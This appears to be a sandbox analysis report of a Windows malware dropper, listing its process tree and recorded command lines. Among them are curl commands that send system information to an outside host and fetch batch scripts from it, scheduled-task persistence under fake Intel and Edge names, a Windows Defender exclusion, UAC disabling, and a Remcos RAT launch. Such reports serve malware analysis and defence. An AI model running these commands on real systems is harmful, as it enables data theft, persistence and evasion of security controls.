PID 3128 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
PID 5008 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2272 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5008 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 5008 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 5008 wrote to memory of 1364 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\in.exe
PID 1364 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\attrib.exe
PID 1364 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1364 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\SYSTEM32\schtasks.exe
PID 1364 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1364 wrote to memory of 4884 N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe
PID 1932 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe
PID 4884 wrote to memory of 1112 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 4884 wrote to memory of 1112 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\PING.EXE
PID 3128 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3128 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3128 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
PID 3128 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3128 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3128 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
PID 3128 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3128 wrote to memory of 3324 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
PID 3128 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3128 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3128 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
PID 3324 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 3324 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe C:\Program Files\Windows Media Player\graph\graph.exe
PID 3128 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3128 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 3128 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
PID 1756 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe C:\Windows\system32\cmd.exe
PID 2756 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2756 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 3128 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Users\Admin\AppData\Local\Temp\a\random.exe

"C:\Users\Admin\AppData\Local\Temp\a\random.exe"

C:\Users\Admin\AppData\Local\Temp\a\client.exe

"C:\Users\Admin\AppData\Local\Temp\a\client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe

"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\9000Z5FCBIE3" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F48474E42574247572F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpF027.tmp.bat

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe

"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\XTR9HDBSJMYU" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp2989.tmp"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\888.exe

"C:\Users\Admin\AppData\Local\Temp\a\888.exe"

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE


C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{a5fe6155-dd2c-4481-8307-6c530f1c484b}

C:\Windows\system32\lsass.exe

"C:\Windows\system32\lsass.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im conhost.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

